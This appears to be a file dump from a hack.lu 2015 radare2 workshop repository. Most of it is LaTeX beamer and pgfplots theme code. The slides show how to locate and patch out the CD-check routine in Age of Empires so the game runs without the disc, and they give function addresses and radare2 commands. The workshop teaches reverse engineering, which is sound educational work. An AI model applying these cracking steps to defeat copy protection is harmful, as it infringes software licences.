Licensed under CC-BY-SA 4.0 International. 5 | % 6 | % The initial template comes from the HSRM beamer theme by Benjamin Weiss, which 7 | % you can find at https://github.com/hsrmbeamertheme/hsrmbeamertheme. 8 | % 9 | 10 | \ProvidesPackage{beamerthemem} 11 | 12 | %{{{ --- Options ---------------------- 13 | 14 | \newif\if@useTitleProgressBar 15 | \newif\if@protectFrameTitle 16 | \newif\if@noSmallCapitals 17 | \newif\if@noSectionSlide 18 | \newif\if@useTotalSlideIndicator 19 | 20 | \@useTitleProgressBarfalse 21 | \@protectFrameTitlefalse 22 | \@noSmallCapitalsfalse 23 | \@noSectionSlidefalse 24 | \@useTotalSlideIndicatorfalse 25 | 26 | \newlength{\@mtheme@voffset} 27 | \setlength{\@mtheme@voffset}{2em} 28 | 29 | \DeclareOptionBeamer{usetitleprogressbar}{\@useTitleProgressBartrue} 30 | \DeclareOptionBeamer{protectframetitle}{\@protectFrameTitletrue} 31 | \DeclareOptionBeamer{blockbg}{% 32 | \PassOptionsToPackage{blockbg}{beamercolorthememetropolis}% 33 | } 34 | \DeclareOptionBeamer{nooffset}{\setlength{\@mtheme@voffset}{0em}} 35 | 36 | \DeclareOptionBeamer*{% 37 | \PackageWarning{beamerthemem}{Unknown option `\CurrentOption'}% 38 | } 39 | 40 | \DeclareOptionBeamer{nosmallcapitals}{\@noSmallCapitalstrue} 41 | \DeclareOptionBeamer{nosectionslide}{\@noSectionSlidetrue} 42 | \DeclareOptionBeamer{usetotalslideindicator}{\@useTotalSlideIndicatortrue} 43 | 44 | \ProcessOptionsBeamer 45 | 46 | %}}} 47 | 48 | \mode 49 | 50 | %{{{ --- Packages --------------------- 51 | 52 | \RequirePackage{etoolbox} 53 | \RequirePackage{tikz} 54 | \RequirePackage{pgfplots} 55 | 56 | \usetikzlibrary{backgrounds} 57 | \usetikzlibrary{calc} 58 | 59 | \usecolortheme{metropolis} 60 | \usefonttheme{metropolis} 61 | 62 | %}}} 63 | %{{{ --- Titlepage -------------------- 64 | 65 | \def\maketitle{\ifbeamer@inframe\titlepage\else\frame[plain]{\titlepage}\fi} 66 | \def\titlepage{\usebeamertemplate{title page}} 67 | 68 | \setbeamertemplate{title page} 69 | { 70 | \begin{minipage}[b][\paperheight]{\textwidth} 71 | \vspace*{\@mtheme@voffset} 72 | 73 | \ifx\inserttitlegraphic\@empty\else 74 | {% \inserttitlegraphic is nonempty 75 | \vbox to 0pt 76 | {% display title graphic without changing the position of other elements 77 | \vspace*{2em} 78 | \usebeamercolor[fg]{titlegraphic}% 79 | \inserttitlegraphic% 80 | }% 81 | \nointerlineskip% 82 | } 83 | \fi 84 | 85 | \vfill% 86 | 87 | \ifx\inserttitle\@empty\else 88 | {{% \inserttitle is nonempty 89 | \raggedright% 90 | \linespread{1.0}% 91 | \usebeamerfont{title}% 92 | \usebeamercolor[fg]{title}% 93 | \if@noSmallCapitals% 94 | \inserttitle% 95 | \else% 96 | \scshape\MakeLowercase{\inserttitle}% 97 | \fi% 98 | \vspace*{0.5em} 99 | }} 100 | \fi 101 | 102 | \ifx\insertsubtitle\@empty\else 103 | {{% \insertsubtitle is nonempty 104 | \usebeamerfont{subtitle}% 105 | \usebeamercolor[fg]{subtitle}% 106 | \insertsubtitle% 107 | \vspace*{0.5em}% 108 | }} 109 | \fi 110 | 111 | \begin{tikzpicture} 112 | \draw[alerted text.fg] (0, 0) -- (\textwidth, 0); 113 | \end{tikzpicture}% 114 | \vspace*{1em}% 115 | 116 | \ifx\beamer@shortauthor\@empty\else 117 | {{% \insertauthor is always nonempty by beamer's definition, so we must 118 | % test another macro which is initialized by \author{...} 119 | % For details, see http://tex.stackexchange.com/questions/241306/ 120 | \usebeamerfont{author}% 121 | \usebeamercolor[fg]{author}% 122 | \insertauthor% 123 | \par% 124 | \vspace*{0.25em} 125 | }} 126 | \fi 127 | 128 | \ifx\insertdate\@empty\else 129 | {{% \insertdate is nonempty 130 | \usebeamerfont{date}% 131 | \usebeamercolor[fg]{date}% 132 | \insertdate% 133 | \par% 134 | }} 135 | \fi 136 | 137 | \ifx\insertinstitute\@empty\else 138 | {{% \insertinstitute is nonempty 139 | \vspace*{3mm} 140 | \usebeamerfont{institute}% 141 | \usebeamercolor[fg]{institute}% 142 | \insertinstitute% 143 | \par% 144 | }} 145 | \fi 146 | 147 | \vfill 148 | \vspace*{\@mtheme@voffset} 149 | \end{minipage} 150 | } 151 | 152 | %}}} 153 | %{{{ --- Progressbar ------------------ 154 | 155 | \makeatletter 156 | \def\progressbar@sectionprogressbar{} 157 | \def\progressbar@titleprogressbar{} 158 | \newcount\progressbar@tmpcounta % auxiliary counter 159 | \newcount\progressbar@tmpcountb % auxiliary counter 160 | \newdimen\progressbar@pbht % progressbar height 161 | \newdimen\progressbar@pbwd % progressbar width 162 | \newdimen\progressbar@tmpdim % auxiliary dimension 163 | 164 | \progressbar@pbwd=22em 165 | \progressbar@pbht=0.4pt 166 | 167 | % the progress bar 168 | \def\progressbar@sectionprogressbar{% 169 | {\usebeamercolor{palette primary}% 170 | \progressbar@tmpcounta=\insertframenumber 171 | \progressbar@tmpcountb=\inserttotalframenumber 172 | \progressbar@tmpdim=\progressbar@pbwd 173 | \divide\progressbar@tmpdim by 100 174 | \multiply\progressbar@tmpdim by \progressbar@tmpcounta 175 | \divide\progressbar@tmpdim by \progressbar@tmpcountb 176 | \multiply\progressbar@tmpdim by 100 177 | 178 | % fixes very high linespacing introduced via \textsc{\MakeLowercase{...}} 179 | \fontsize{1em}{1em}\selectfont 180 | 181 | \makebox[\textwidth][c]{ 182 | \begin{tikzpicture}[tight background] 183 | 184 | \node[anchor=south west, fg, inner sep=0pt, text width=\progressbar@pbwd] at (0pt, 0pt) {\insertsectionHEAD}; 185 | 186 | \draw[anchor=west, fg!20, fill=fg!20, inner sep=0pt] 187 | (0, -1ex) rectangle ++ (\progressbar@pbwd, \progressbar@pbht); 188 | 189 | \draw[anchor=west, fg, fill=fg, inner sep=0pt] 190 | (0, -1ex) rectangle ++ (\progressbar@tmpdim, \progressbar@pbht); 191 | \end{tikzpicture}% 192 | } 193 | } % end usebeamercolor{palette primary} 194 | } 195 | 196 | \if@useTitleProgressBar 197 | \def\progressbar@titleprogressbar{% 198 | \progressbar@tmpcounta=\insertframenumber 199 | \progressbar@tmpcountb=\inserttotalframenumber 200 | \progressbar@tmpdim=\paperwidth 201 | \divide\progressbar@tmpdim by 100 202 | \multiply\progressbar@tmpdim by \progressbar@tmpcounta 203 | \divide\progressbar@tmpdim by \progressbar@tmpcountb 204 | \multiply\progressbar@tmpdim by 100 205 | {% 206 | \usebeamercolor{palette quaternary}% 207 | \usebeamercolor{alerted text}% 208 | \begin{tikzpicture}[tight background] 209 | \draw[palette quaternary.fg, fill=palette quaternary.fg] (0, 0) rectangle ($(\paperwidth, 0.6pt) - (0.4pt, 0)$); 210 | \draw[alerted text.fg, fill=alerted text.fg] (0, 0) rectangle (\progressbar@tmpdim, 0.6pt); 211 | \end{tikzpicture}% 212 | }% 213 | } 214 | \fi 215 | %}}} 216 | %{{{ --- Commands --------------------- 217 | 218 | \newcommand{\insertsectionHEAD}{% 219 | \expandafter\insertsectionHEADaux\insertsectionhead} 220 | 221 | \if@noSmallCapitals% 222 | \newcommand{\insertsectionHEADaux}[3]{#3}% 223 | \else% 224 | \newcommand{\insertsectionHEADaux}[3]{\textsc{\MakeLowercase{#3}}}% 225 | \fi% 226 | 227 | \newcommand{\plain}[2][]{% 228 | \begingroup 229 | \setbeamercolor{background canvas}{use=palette primary,bg=palette primary.fg} 230 | \begin{frame}{#1} 231 | \centering 232 | \vfill\vspace{1em}\usebeamerfont{section title}\textcolor{white}{\scshape #2}\vfill 233 | \end{frame} 234 | \endgroup 235 | } 236 | 237 | %}}} 238 | %{{{ --- Itemize ---------------------- 239 | 240 | \setlength{\leftmargini}{1em} 241 | 242 | % Actually one level should be enough but ... 243 | \setlength{\leftmarginii}{1em} 244 | \setlength{\leftmarginiii}{1em} 245 | 246 | \newcommand{\itemBullet}{∙} 247 | 248 | \setbeamertemplate{itemize item}{\itemBullet} 249 | \setbeamertemplate{itemize subitem}{\itemBullet} 250 | \setbeamertemplate{itemize subsubitem}{\itemBullet} 251 | \setlength{\parskip}{0.5em} 252 | 253 | %}}} 254 | %{{{ --- Sections --------------------- 255 | 256 | % Insert frame with section title at every section start 257 | \AtBeginSection[] 258 | { 259 | \if@noSectionSlide% 260 | \else% 261 | \begingroup 262 | \setbeamercolor{background canvas}{parent=palette primary} 263 | \begin{frame}[plain] 264 | \vspace{2em}\usebeamerfont{section title} 265 | \progressbar@sectionprogressbar% 266 | \end{frame} 267 | \endgroup 268 | \fi% 269 | } 270 | 271 | %}}} 272 | %{{{ --- Captions --------------------- 273 | 274 | \setbeamertemplate{caption label separator}{: } 275 | \setbeamertemplate{caption}[numbered] 276 | 277 | %}}} 278 | %{{{ --- Footline/footnote ------------ 279 | 280 | \usenavigationsymbolstemplate{} 281 | \setbeamertemplate{footline} 282 | {% 283 | \begin{beamercolorbox}[wd=\textwidth,ht=3ex,dp=3ex,leftskip=0.3cm,rightskip=0.3cm]{structure}% 284 | \hfill\usebeamerfont{page number in head/foot}% 285 | \if@useTotalSlideIndicator% 286 | \insertframenumber/\inserttotalframenumber% 287 | \else% 288 | \insertframenumber% 289 | \fi% 290 | \end{beamercolorbox}% 291 | } 292 | 293 | \setbeamertemplate{footnote} 294 | {% 295 | \parindent 0em\noindent% 296 | \raggedright 297 | \usebeamercolor{footnote}\hbox to 0.8em{\hfil\insertfootnotemark}\insertfootnotetext\par% 298 | } 299 | 300 | %}}} 301 | %{{{ --- Frametitle ------------------- 302 | 303 | \setbeamertemplate{frametitle}{% 304 | \nointerlineskip 305 | \begin{beamercolorbox}[wd=\paperwidth,leftskip=0.3cm,rightskip=0.3cm,ht=2.5ex,dp=1.5ex]{frametitle} 306 | \usebeamerfont{frametitle}% 307 | \if@protectFrameTitle% 308 | \protect% 309 | \if@noSmallCapitals% 310 | \insertframetitle% 311 | \else% 312 | \textsc{\MakeLowercase{\insertframetitle}}% 313 | \fi% 314 | \else% 315 | \if@noSmallCapitals% 316 | \insertframetitle% 317 | \else% 318 | \textsc{\MakeLowercase{\insertframetitle}}% 319 | \fi% 320 | \fi% 321 | \end{beamercolorbox}% 322 | \if@useTitleProgressBar 323 | \vspace{-.5em} 324 | \begin{beamercolorbox}[wd=\paperwidth,ht=1pt,dp=0pt]{frametitle} 325 | \progressbar@titleprogressbar 326 | \end{beamercolorbox} 327 | \fi 328 | \vspace{\@mtheme@voffset} 329 | } 330 | 331 | %}}} 332 | %{{{ --- pgfplots --------------------- 333 | 334 | %{{{ Colors 335 | 336 | % TolColors from http://www.r-bloggers.com/the-paul-tol-21-color-salute/ 337 | \definecolor{TolColor1}{HTML}{332288} % dark purple 338 | \definecolor{TolColor2}{HTML}{6699CC} % dark blue 339 | \definecolor{TolColor3}{HTML}{88CCEE} % light blue 340 | \definecolor{TolColor4}{HTML}{44AA99} % light green 341 | \definecolor{TolColor5}{HTML}{117733} % dark green 342 | \definecolor{TolColor6}{HTML}{999933} % dark brown 343 | \definecolor{TolColor7}{HTML}{DDCC77} % light brown 344 | \definecolor{TolColor8}{HTML}{661100} % dark red 345 | \definecolor{TolColor9}{HTML}{CC6677} % light red 346 | \definecolor{TolColor10}{HTML}{AA4466} % light pink 347 | \definecolor{TolColor11}{HTML}{882255} % dark pink 348 | \definecolor{TolColor12}{HTML}{AA4499} % light purple 349 | 350 | %}}} 351 | %{{{ Color cycles 352 | 353 | \pgfplotscreateplotcyclelist{mbarplot cycle}{% 354 | {draw=TolColor2, fill=TolColor2!70}, 355 | {draw=TolColor7, fill=TolColor7!70}, 356 | {draw=TolColor4, fill=TolColor4!70}, 357 | {draw=TolColor11, fill=TolColor11!70}, 358 | {draw=TolColor1, fill=TolColor1!70}, 359 | {draw=TolColor8, fill=TolColor8!70}, 360 | {draw=TolColor6, fill=TolColor6!70}, 361 | {draw=TolColor9, fill=TolColor9!70}, 362 | {draw=TolColor10, fill=TolColor10!70}, 363 | {draw=TolColor12, fill=TolColor12!70}, 364 | {draw=TolColor3, fill=TolColor3!70}, 365 | {draw=TolColor5, fill=TolColor5!70}, 366 | } 367 | 368 | \pgfplotscreateplotcyclelist{mlineplot cycle}{% 369 | {TolColor2, mark=*, mark size=1.5pt}, 370 | {TolColor7, mark=square*, mark size=1.3pt}, 371 | {TolColor4, mark=triangle*, mark size=1.5pt}, 372 | {TolColor6, mark=diamond*, mark size=1.5pt}, 373 | } 374 | 375 | %}}} 376 | %{{{ Styles 377 | 378 | \pgfplotsset{ 379 | compat=1.9, 380 | mbaseplot/.style={ 381 | legend style={ 382 | draw=none, 383 | fill=none, 384 | cells={anchor=west}, 385 | }, 386 | x tick label style={ 387 | font=\footnotesize 388 | }, 389 | y tick label style={ 390 | font=\footnotesize 391 | }, 392 | legend style={ 393 | font=\footnotesize 394 | }, 395 | major grid style={ 396 | dotted, 397 | }, 398 | axis x line*=bottom, 399 | }, 400 | mlineplot/.style={ 401 | mbaseplot, 402 | xmajorgrids=true, 403 | ymajorgrids=true, 404 | major grid style={dotted}, 405 | axis x line=bottom, 406 | axis y line=left, 407 | legend style={ 408 | cells={anchor=west}, 409 | draw=none 410 | }, 411 | cycle list name=mlineplot cycle, 412 | }, 413 | mbarplot base/.style={ 414 | mbaseplot, 415 | bar width=6pt, 416 | axis y line*=none, 417 | }, 418 | mbarplot/.style={ 419 | mbarplot base, 420 | ybar, 421 | xmajorgrids=false, 422 | ymajorgrids=true, 423 | area legend, 424 | legend image code/.code={% 425 | \draw[#1] (0cm,-0.1cm) rectangle (0.15cm,0.1cm); 426 | }, 427 | cycle list name=mbarplot cycle, 428 | }, 429 | horizontal mbarplot/.style={ 430 | mbarplot base, 431 | xmajorgrids=true, 432 | ymajorgrids=false, 433 | xbar stacked, 434 | area legend, 435 | legend image code/.code={% 436 | \draw[#1] (0cm,-0.1cm) rectangle (0.15cm,0.1cm); 437 | }, 438 | cycle list name=mbarplot cycle, 439 | }, 440 | disable thousands separator/.style={ 441 | /pgf/number format/.cd, 442 | 1000 sep={} 443 | }, 444 | } 445 | 446 | %}}} 447 | 448 | \mode 449 | 450 | %{{{ misc 451 | \let\otp\titlepage 452 | \renewcommand{\titlepage}{\otp\addtocounter{framenumber}{-1}} 453 | \newcommand{\mreducelistspacing}{\vspace{-\topsep}} 454 | 455 | \linespread{1.15} 456 | 457 | %}}} 458 | -------------------------------------------------------------------------------- /nocd/pix/aoe.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/nocd/pix/aoe.jpg -------------------------------------------------------------------------------- /nocd/pix/crack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/nocd/pix/crack.png -------------------------------------------------------------------------------- /nocd/pix/ii.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/nocd/pix/ii.png -------------------------------------------------------------------------------- /nocd/pix/script.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/nocd/pix/script.png -------------------------------------------------------------------------------- /nocd/pix/x230.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/nocd/pix/x230.png -------------------------------------------------------------------------------- /nocd/slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/nocd/slides.pdf -------------------------------------------------------------------------------- /nocd/slides.tex: -------------------------------------------------------------------------------- 1 | \documentclass{beamer} 2 | 3 | \usepackage[english]{ babel } 4 | \usepackage[T1]{ fontenc } 5 | \usepackage{ graphicx } 6 | \graphicspath{ {./pix/} } 7 | 8 | \usetheme[block=fill]{m} 9 | 10 | \newlength{\blackoutwidth} 11 | \newcommand{\blackout}[1] 12 | {%necessary comment 13 | \settowidth{\blackoutwidth}{#1}%necessary comment 14 | \rule[-0.3em]{\blackoutwidth}{1.125em}%necessary comment 15 | } 16 | 17 | \title{Radare2 workshop} 18 | \author{Writing a crack for \blackout{Age of Empire} } 19 | \date{\today} 20 | \institute{hack.lu 2015} 21 | 22 | \begin{document} 23 | 24 | \maketitle 25 | 26 | \begin{frame}{whoami} 27 | \begin{block}{Julien (jvoisin) Voisin} 28 | \begin{itemize} 29 | \item French 30 | \item Freshly graduated 31 | \item I don't know Windows 32 | \end{itemize} 33 | \end{block} 34 | \end{frame} 35 | 36 | \begin{frame}{Disclaimer} 37 | \begin{center} 38 | Piracy is \alert{bad}, m'kay. 39 | \end{center} 40 | \end{frame} 41 | 42 | \begin{frame}{What is this?} 43 | \begin{center} 44 | \includegraphics[width=.9\textwidth]{aoe.jpg} 45 | \end{center} 46 | \end{frame} 47 | 48 | \begin{frame}{And what is this?} 49 | \begin{center} 50 | \includegraphics[width=.75\textwidth]{x230.png} 51 | \end{center} 52 | \end{frame} 53 | 54 | \begin{frame}{But I still want to play!} 55 | Time to write a \alert{compatibility enhancement hotfix}! 56 | \vskip1em 57 | \pause 58 | While knowing close to nothing about the Windows world. 59 | \end{frame} 60 | 61 | \begin{frame}{Where to look} 62 | \begin{center} 63 | In your virtual machine, in the \alert{nocd} folder. 64 | \end{center} 65 | \end{frame} 66 | 67 | \begin{frame}{Finding the right function} 68 | \includegraphics[width=\textwidth]{ii.png}\\ 69 | \end{frame} 70 | 71 | \begin{frame}{Lets script some documentation fetcher for r2} 72 | \begin{center} 73 | \includegraphics[width=\textwidth,height=.3\textheight]{script.png}\\ 74 | \pause 75 | You've got this one in your .radare2rc in the VM 76 | \end{center} 77 | \end{frame} 78 | 79 | \begin{frame}{Find where it's called} 80 | \begin{block}{Your turn!} 81 | \begin{itemize}[<+->] 82 | \item Find where \alert{GetDriveTypeA} is called 83 | \item It's likely an \alert{a}nalysis command, about \alert{x}ref \alert{t}o something 84 | \item There are two locations: 85 | \begin{itemize} 86 | \item \emph{0x4d65f6} 87 | \item \emph{0x5352ee} 88 | \end{itemize} 89 | \item In what function do they belong? 90 | \item Still in \alert{a}nalysis, \alert{f}unction related, about \alert{i}nformation 91 | \item \emph{afi 0x4d65f6} 92 | \item \emph{afi 0x5352ee} 93 | \end{itemize} 94 | \end{block} 95 | \end{frame} 96 | 97 | \begin{frame}{Find where it's called (cont.)} 98 | \begin{block}{Your turn!} 99 | \begin{itemize}[<+->] 100 | \item \alert{0x4d65f6} is called from two locations: 101 | \begin{itemize} 102 | \item \emph{0x004d6550} 103 | \item \emph{0x004ab1aa} 104 | \end{itemize} 105 | \item Which one is the relevant one? (check with \emph{VV}) 106 | \item \alert{0x004d6550} is the cd-check routine! 107 | \end{itemize} 108 | \end{block} 109 | \end{frame} 110 | 111 | \begin{frame}{Patching time} 112 | \begin{enumerate} 113 | \item Reopen the binary in \alert{write} mode with \emph{oo+} 114 | \item Hardcode a return value for \alert{fcn.0x004d6550} 115 | \item Play the game without the CD! 116 | \end{enumerate} 117 | \end{frame} 118 | 119 | \begin{frame}{My solution} 120 | \includegraphics[width=\textwidth,height=.3\textheight]{crack.png} 121 | \end{frame} 122 | 123 | \section*{Conclusion} 124 | \begin{frame}{Conclusion} 125 | \begin{center} 126 | \only<1>{ 127 | \begin{itemize} 128 | \item Having no CD reader sucks, 129 | \item Age of Empire is cool, 130 | \item So is radare2. 131 | \end{itemize} 132 | } 133 | \only<2>{ 134 | \Large 135 | Radare2 is \alert{nice}. 136 | 137 | You should use it. 138 | } 139 | \end{center} 140 | \end{frame} 141 | 142 | \begin{frame}{Resources} 143 | \begin{itemize} 144 | \item \href{https://github.com/radare/radare2}{Github repo} 145 | \item \href{http://rada.re}{Official website} 146 | \item \href{http://radare.today}{The r2 blog} 147 | \item \href{http://maijin.github.io/radare2book/}{The r2 book} 148 | \item \href{https://twitter.com/radareorg}{Twitter} 149 | \end{itemize} 150 | \end{frame} 151 | 152 | \end{document} 153 | -------------------------------------------------------------------------------- /pe_certificate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pe_certificate -------------------------------------------------------------------------------- /pgfplotsthemetol.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `pgfplotsthemetol.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% pgfplotsthemetol.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{pgfplotsthemetol} 21 | [2015/06/16 PGFplots colors based on Paul Tol's SRON technical note] 22 | \definecolor{TolDarkPurple}{HTML}{332288} 23 | \definecolor{TolDarkBlue}{HTML}{6699CC} 24 | \definecolor{TolLightBlue}{HTML}{88CCEE} 25 | \definecolor{TolLightGreen}{HTML}{44AA99} 26 | \definecolor{TolDarkGreen}{HTML}{117733} 27 | \definecolor{TolDarkBrown}{HTML}{999933} 28 | \definecolor{TolLightBrown}{HTML}{DDCC77} 29 | \definecolor{TolDarkRed}{HTML}{661100} 30 | \definecolor{TolLightRed}{HTML}{CC6677} 31 | \definecolor{TolLightPink}{HTML}{AA4466} 32 | \definecolor{TolDarkPink}{HTML}{882255} 33 | \definecolor{TolLightPurple}{HTML}{AA4499} 34 | \pgfplotscreateplotcyclelist{mbarplot cycle}{% 35 | {draw=TolDarkBlue, fill=TolDarkBlue!70}, 36 | {draw=TolLightBrown, fill=TolLightBrown!70}, 37 | {draw=TolLightGreen, fill=TolLightGreen!70}, 38 | {draw=TolDarkPink, fill=TolDarkPink!70}, 39 | {draw=TolDarkPurple, fill=TolDarkPurple!70}, 40 | {draw=TolDarkRed, fill=TolDarkRed!70}, 41 | {draw=TolDarkBrown, fill=TolDarkBrown!70}, 42 | {draw=TolLightRed, fill=TolLightRed!70}, 43 | {draw=TolLightPink, fill=TolLightPink!70}, 44 | {draw=TolLightPurple, fill=TolLightPurple!70}, 45 | {draw=TolLightBlue, fill=TolLightBlue!70}, 46 | {draw=TolDarkGreen, fill=TolDarkGreen!70}, 47 | } 48 | \pgfplotscreateplotcyclelist{mlineplot cycle}{% 49 | {TolDarkBlue, mark=*, mark size=1.5pt}, 50 | {TolLightBrown, mark=square*, mark size=1.3pt}, 51 | {TolLightGreen, mark=triangle*, mark size=1.5pt}, 52 | {TolDarkBrown, mark=diamond*, mark size=1.5pt}, 53 | } 54 | \pgfplotsset{ 55 | compat=1.9, 56 | mlineplot/.style={ 57 | mbaseplot, 58 | xmajorgrids=true, 59 | ymajorgrids=true, 60 | major grid style={dotted}, 61 | axis x line=bottom, 62 | axis y line=left, 63 | legend style={ 64 | cells={anchor=west}, 65 | draw=none 66 | }, 67 | cycle list name=mlineplot cycle, 68 | }, 69 | mbarplot base/.style={ 70 | mbaseplot, 71 | bar width=6pt, 72 | axis y line*=none, 73 | }, 74 | mbarplot/.style={ 75 | mbarplot base, 76 | ybar, 77 | xmajorgrids=false, 78 | ymajorgrids=true, 79 | area legend, 80 | legend image code/.code={% 81 | \draw[#1] (0cm,-0.1cm) rectangle (0.15cm,0.1cm); 82 | }, 83 | cycle list name=mbarplot cycle, 84 | }, 85 | horizontal mbarplot/.style={ 86 | mbarplot base, 87 | xmajorgrids=true, 88 | ymajorgrids=false, 89 | xbar stacked, 90 | area legend, 91 | legend image code/.code={% 92 | \draw[#1] (0cm,-0.1cm) rectangle (0.15cm,0.1cm); 93 | }, 94 | cycle list name=mbarplot cycle, 95 | }, 96 | mbaseplot/.style={ 97 | legend style={ 98 | draw=none, 99 | fill=none, 100 | cells={anchor=west}, 101 | }, 102 | x tick label style={ 103 | font=\footnotesize 104 | }, 105 | y tick label style={ 106 | font=\footnotesize 107 | }, 108 | legend style={ 109 | font=\footnotesize 110 | }, 111 | major grid style={ 112 | dotted, 113 | }, 114 | axis x line*=bottom, 115 | }, 116 | disable thousands separator/.style={ 117 | /pgf/number format/.cd, 118 | 1000 sep={} 119 | }, 120 | } 121 | \endinput 122 | %% 123 | %% End of file `pgfplotsthemetol.sty'. 124 | -------------------------------------------------------------------------------- /pix/GOT.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/GOT.png -------------------------------------------------------------------------------- /pix/binsh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/binsh.png -------------------------------------------------------------------------------- /pix/bruijn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/bruijn.png -------------------------------------------------------------------------------- /pix/code.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/code.png -------------------------------------------------------------------------------- /pix/crimages/bin-info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/crimages/bin-info.png -------------------------------------------------------------------------------- /pix/crimages/bof1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/crimages/bof1.png -------------------------------------------------------------------------------- /pix/crimages/peda_context.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/crimages/peda_context.png -------------------------------------------------------------------------------- /pix/crimages/poppopret.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/crimages/poppopret.png -------------------------------------------------------------------------------- /pix/crimages/r2_context1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/crimages/r2_context1.png -------------------------------------------------------------------------------- /pix/crimages/shellcode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/crimages/shellcode.png -------------------------------------------------------------------------------- /pix/diff.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/diff.png -------------------------------------------------------------------------------- /pix/exploit_pwn1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/exploit_pwn1.png -------------------------------------------------------------------------------- /pix/exploit_pwn2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/exploit_pwn2.png -------------------------------------------------------------------------------- /pix/got.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/got.png -------------------------------------------------------------------------------- /pix/libc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/libc.png -------------------------------------------------------------------------------- /pix/overflow1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/overflow1.png -------------------------------------------------------------------------------- /pix/overflow2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/overflow2.png -------------------------------------------------------------------------------- /pix/overflow3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/overflow3.png -------------------------------------------------------------------------------- /pix/plt_after.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/plt_after.png -------------------------------------------------------------------------------- /pix/plt_before.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/plt_before.png -------------------------------------------------------------------------------- /pix/ppp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/ppp.png -------------------------------------------------------------------------------- /pix/pppr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/pppr.png -------------------------------------------------------------------------------- /pix/pwn1_shellcode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/pwn1_shellcode.png -------------------------------------------------------------------------------- /pix/pwn2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/pwn2.png -------------------------------------------------------------------------------- /pix/r2-nativedebug.png: -------------------------------------------------------------------------------- 